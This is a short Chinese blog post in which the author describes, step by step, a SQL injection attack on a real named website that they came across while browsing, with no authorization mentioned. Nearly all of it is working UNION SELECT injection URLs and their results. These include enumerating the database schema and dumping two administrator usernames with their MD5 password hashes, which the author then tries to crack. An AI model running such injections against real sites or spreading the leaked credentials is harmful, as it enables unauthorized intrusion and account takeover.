首先,本文没有任何技术含量,再者,请勿将本文提供信息用作非法用途。
正文开始
在茫茫“网海”冲浪,偶然间看到一个链接格式为php?id= 习惯性的加了个'(也许我该请个心理医生咨询咨询)
错误,虽然没有任何提示,内容消失了
然后,闲着也是闲着
首先注入地址
http://webi.tom.com/content.php?id=658
先爆字段长度
http://webi.tom.com/content.php?id=658 order by 14 返回正常
http://webi.tom.com/content.php?id=658 order by 15 返回错误
字段数为15,接下来伪造地址
http://webi.tom.com/content.php?id=658 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
返回结果中2为文章标题,8 5 在文章正文处显示,继续伪造读取服务器信息
http://webi.tom.com/content.php?id=658 and 1=2 union select 1,version() ,3,4,user(),6,7,database(),9,10,11,12,13,14/*
返回结果显示
数据库:web@localhost
用户:webi
版本:5.0.41
继续猜测表名称
http://webi.tom.com/content.php?id=658 and 1=2 union select 1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14 from information[去掉我]_schema.TABLES limit 0,1/*
结果居然是admin,汗颜,早知道就直接检测字段了,转换字段admin = 0x61646D696E ,伪造检测字段语句
http://webi.tom.com/content.php?id=658 and 1=2 Union select 1,COLUMN_NAME,3,4,5,6,7,8,9,10,11,12,13,14 from information[去掉我]_schema.COLUMNS where TABLE_NAME=0x61646D696E limit 0,1
根据结果判断
用户名字段:name
密码字段:password
读取用户密码信息
http://webi.tom.com/content.php?id=658 and 1=2 union select 1,name,3,4,password,6,7,8,9,10,11,12,13,14 from admin limit 0,1/*
得到结果如下
管理员A账号:edit
管理员A密码MD5值:bc8b1a45120733a8314adb486245815f
管理员B账号:zhaodi
管理员B密码MD5值:92992fe1f754afcc5c95c05cd3c3afde
接下来就是破解密码MD5值,寻找登陆入口,我到MD5检测的网站检测了下,提示说找到检测结果,但是要收费才给显示··晕。
到这里就告一段落吧,因为~ 我真的困了。
想不到你也是性情中人啊!哈哈哈